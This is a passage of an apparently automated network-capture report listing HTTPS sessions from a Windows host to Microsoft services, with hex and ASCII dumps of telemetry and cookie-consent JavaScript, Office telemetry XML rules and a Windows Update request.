                                                                                                                                                                                            2024-11-20 20:04:49 UTC16384INData Raw: 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70
                                                                                                                                                                                            Data Ascii: uthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="sp
                                                                                                                                                                                            2024-11-20 20:04:49 UTC16384INData Raw: 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c
                                                                                                                                                                                            Data Ascii: )),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            13192.168.2.44977113.107.246.634432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:04:50 UTC373OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                            Host: wcpstatic.microsoft.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-20 20:04:51 UTC712INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:04:51 GMT
                                                                                                                                                                                            Content-Type: application/javascript
                                                                                                                                                                                            Content-Length: 52717
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                            Age: 3557
                                                                                                                                                                                            Cache-Control: max-age=43200
                                                                                                                                                                                            Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                            Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                            Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                            x-ms-request-id: 1f729e99-f01e-00b6-687f-3b5f37000000
                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                            x-azure-ref: 20241120T200451Z-1777c6cb754dqf99hC1TEB5nps00000009yg000000009ppc
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:04:51 UTC15672INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                            Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                            2024-11-20 20:04:51 UTC16384INData Raw: 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69 65
                                                                                                                                                                                            Data Ascii: {return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cookie
                                                                                                                                                                                            2024-11-20 20:04:51 UTC16384INData Raw: 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61
                                                                                                                                                                                            Data Ascii: r"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + la
                                                                                                                                                                                            2024-11-20 20:04:51 UTC4277INData Raw: 6d 65 6e 74 42 79 49 64 28 22 77 63 70 43 6f 6e 73 65 6e 74 42 61 6e 6e 65 72 43 74 72 6c 22 29 7d 2c 65 2e 65 6d 69 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 74 5b 6f 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 3b 76 61 72 20 6e 3d 74 68 69 73 2e 65 76 65 6e 74 73 5b 65 5d 3b 6e 26 26 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 74 29 7d 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 65 2e 61 64 64 45 76 65 6e 74 4c
                                                                                                                                                                                            Data Ascii: mentById("wcpConsentBannerCtrl")},e.emit=function(e){for(var t=[],o=1;o<arguments.length;o++)t[o-1]=arguments[o];var n=this.events[e];n&&n.forEach((function(e){e.apply(null,t)}))},e.prototype.addEventListener=function(e,t,o){e.addEventListener?e.addEventL


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            14192.168.2.44979613.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:04:57 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:04:58 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:04:57 GMT
                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                            Content-Length: 218853
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public
                                                                                                                                                                                            Last-Modified: Tue, 19 Nov 2024 13:10:03 GMT
                                                                                                                                                                                            ETag: "0x8DD089B7B2F27B3"
                                                                                                                                                                                            x-ms-request-id: 082f1a68-301e-005d-348c-3ae448000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200457Z-r1d97b995774n5h6hC1TEBvf8400000009cg0000000032ut
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:04:58 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                            Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                            2024-11-20 20:04:58 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                            Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                            2024-11-20 20:04:58 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                            Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                            2024-11-20 20:04:58 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                            Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                            2024-11-20 20:04:58 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                            Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                            2024-11-20 20:04:58 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                            Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                            2024-11-20 20:04:58 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                            Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                            2024-11-20 20:04:58 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                            Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                            2024-11-20 20:04:58 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                            2024-11-20 20:04:58 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            15192.168.2.449805172.202.163.200443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:04:59 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=gzyZfBdA9bgtO6B&MD=sVMyygHk HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                                                                            2024-11-20 20:05:00 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                            ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                            MS-CorrelationId: 09fb6d87-2103-4e05-8fdc-9916d90ffc16
